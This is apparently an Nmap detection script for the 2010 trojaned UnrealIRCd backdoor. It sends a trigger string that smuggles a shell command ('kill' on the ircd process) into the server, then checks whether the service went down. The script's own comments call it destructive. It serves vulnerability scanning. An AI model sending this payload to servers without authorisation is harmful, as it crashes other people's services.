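description = [[
Checks if an IRC server is backdoored:

Reference:
http://seclists.org/fulldisclosure/2010/Jun/277
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
]]

---
-- @output
-- PORT     STATE SERVICE
-- 6667/tcp open  irc
-- |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. IRC server is now DOWN. See http://seclists.org/fulldisclosure/2010/Jun/277
--

author = "Vlatko Kosturjak"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive"}

require "shortport"
require "comm"
require "stdnse"

portrule = shortport.port_or_service({6666,6667,6697,6679,8067},{"irc","ircs"})

-- Trigger string taken from the referenced advisory. On an affected server it
-- causes the ircd process to terminate, which the second probe below detects.
-- Hoisted so both connections send exactly the same bytes.
local TRIGGER = "AB;kill `ps -e | grep ircd | awk '{ print $1 }'`\n"

-- Connection options shared by both probes: 10 s timeout, and do not wait for
-- a server banner before sending.
local OPTS = {timeout=10000, recv_before=false}

--- Detects the backdoored UnrealIRCd build by sending the trigger and then
-- checking whether the server still accepts connections.
-- This check is destructive ("intrusive" category): on an affected host the
-- ircd process is killed and the service stays down.
-- @param host Nmap host table.
-- @param port Nmap port table.
-- @return string Result message when the server went down after the trigger;
--   nil when it stayed up or when the initial connection failed.
action = function(host, port)
  -- First connection: deliver the trigger. Only the socket is needed; the
  -- response (if any) is not inspected.
  local socket = comm.tryssl(host, port, TRIGGER, OPTS)
  if not socket then
    stdnse.print_debug(1, "cannot connect to port which was open in port scan?")
    return
  end
  stdnse.print_debug(2, "vulnerability trigger sent successfully.")
  socket:close()

  -- Give the remote process time to terminate before re-probing. A fixed 1 s
  -- wait may be too short on a slow or loaded host, which would yield a false
  -- negative ("not trojaned") rather than a false positive.
  stdnse.sleep(1)

  -- Second connection: if the server no longer accepts connections, the
  -- trigger took effect.
  local csocket = comm.tryssl(host, port, TRIGGER, OPTS)
  if not csocket then
    stdnse.print_debug(1, "IRC server looks down. Probably trojaned version of unrealircd")
    return "Looks like trojaned version of unrealircd. IRC server is now DOWN. See http://seclists.org/fulldisclosure/2010/Jun/277"
  end
  stdnse.print_debug(1, "IRC server not trojaned")
  csocket:close()
end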